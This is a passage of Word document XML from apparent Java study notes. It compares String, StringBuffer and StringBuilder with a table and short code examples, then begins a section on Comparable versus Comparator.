          </w:tcPr>
          <w:p w14:paraId="524BED2B" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="008D5751">
            <w:pPr>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Fastest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D5751" w:rsidRPr="00CE4B95" w14:paraId="4388C08F" w14:textId="77777777" w:rsidTr="008D5751">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4ED59DA6" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="00B234DE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Synchronized</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="740DC22B" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="008D5751">
            <w:pPr>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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EDED5CB" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="008D5751">
            <w:pPr>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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55BCB56B" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="008D5751">
            <w:pPr>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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D5751" w:rsidRPr="00CE4B95" w14:paraId="75209F41" w14:textId="77777777" w:rsidTr="008D5751">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="704FFCFF" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="00B234DE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47A9B4AD" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="008D5751">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Constant Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54853C5E" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="008D5751">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Multi-threaded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1669D517" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="008D5751">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Single-threaded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D5751" w:rsidRPr="00CE4B95" w14:paraId="09C5B176" w14:textId="77777777" w:rsidTr="008D5751">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F8A80E3" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="00B234DE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Memory Efficient?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F7F8377" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="008D5751">
            <w:pPr>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If constant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59E367F0" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="008D5751">
            <w:pPr>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More overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="041737D6" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="008D5751">
            <w:pPr>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More efficient</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70682F8F" w14:textId="49A0908B" w:rsidR="0090069D" w:rsidRPr="00CE4B95" w:rsidRDefault="0090069D" w:rsidP="0090069D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example Comparison</w:t>
      </w:r>
      <w:r w:rsidR="004B5978" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3D6847" w14:textId="77777777" w:rsidR="0090069D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// String (Immutable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D63FCA" w14:textId="77777777" w:rsidR="0090069D" w:rsidRPr="00CE4B95"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t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Java"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6159F39C" w14:textId="77777777" w:rsidR="0090069D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>st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nca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 World"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E38F99" w14:textId="77777777" w:rsidR="0090069D" w:rsidRPr="00CE4B95"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Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F08B7F2" w14:textId="77777777" w:rsidR="0090069D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C0C5AA" w14:textId="77777777" w:rsidR="00925120" w:rsidRPr="00CE4B95" w:rsidRDefault="009251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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C85B72D" w14:textId="77777777" w:rsidR="0090069D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// StringBuffer (Mutable + Thread-safe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D1015C" w14:textId="77777777" w:rsidR="0090069D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StringBuffer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sb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Buffer</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Java"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2DC8E3" w14:textId="77777777" w:rsidR="0090069D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s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ppen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 World"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10809B97" w14:textId="77777777" w:rsidR="0090069D" w:rsidRPr="00CE4B95"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Java World</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DD96E5" w14:textId="77777777" w:rsidR="0090069D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF29B05" w14:textId="77777777" w:rsidR="0090069D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// StringBuilder (Mutable + Not thread-safe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5931E1C3" w14:textId="77777777" w:rsidR="0090069D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StringBuilder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sb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Builder</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Java"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AED299" w14:textId="77777777" w:rsidR="0090069D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sb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ppen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 World"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F5343B" w14:textId="48D37C33" w:rsidR="0090069D" w:rsidRPr="00CE4B95"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b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Java World</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B09A6C" w14:textId="6B20AA69" w:rsidR="00B7737D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B7737D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="6F5D58B2">
          <v:rect id="_x0000_i1106" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="442D23D0" w14:textId="77777777" w:rsidR="000C2FD8" w:rsidRPr="00CE4B95" w:rsidRDefault="000C2FD8" w:rsidP="00B7737D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C729251" w14:textId="77777777" w:rsidR="000C2FD8" w:rsidRPr="00CE4B95" w:rsidRDefault="000C2FD8" w:rsidP="00B7737D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2082B7C8" w14:textId="74ECA0AF" w:rsidR="00A8268C" w:rsidRPr="00CE4B95" w:rsidRDefault="005F5AB9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc196307502"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00501DAE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between comparable and comparator</w:t>
      </w:r>
      <w:r w:rsidR="00A8268C" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="0CAB12D8" w14:textId="173F2851" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>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7"/>
        <w:gridCol w:w="4193"/>
        <w:gridCol w:w="4014"/>
      </w:tblGrid>
      <w:tr w:rsidR="00062B56" w:rsidRPr="00CE4B95" w14:paraId="37A6E106" w14:textId="77777777" w:rsidTr="00062B56">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19FE93B4" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="000619E2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="567532D0" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="000619E2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Comparable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="692B27E8" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="000619E2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Comparator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00062B56" w:rsidRPr="00CE4B95" w14:paraId="083658B8" w14:textId="77777777" w:rsidTr="00062B56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="181372AE" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Package</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D234C56" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
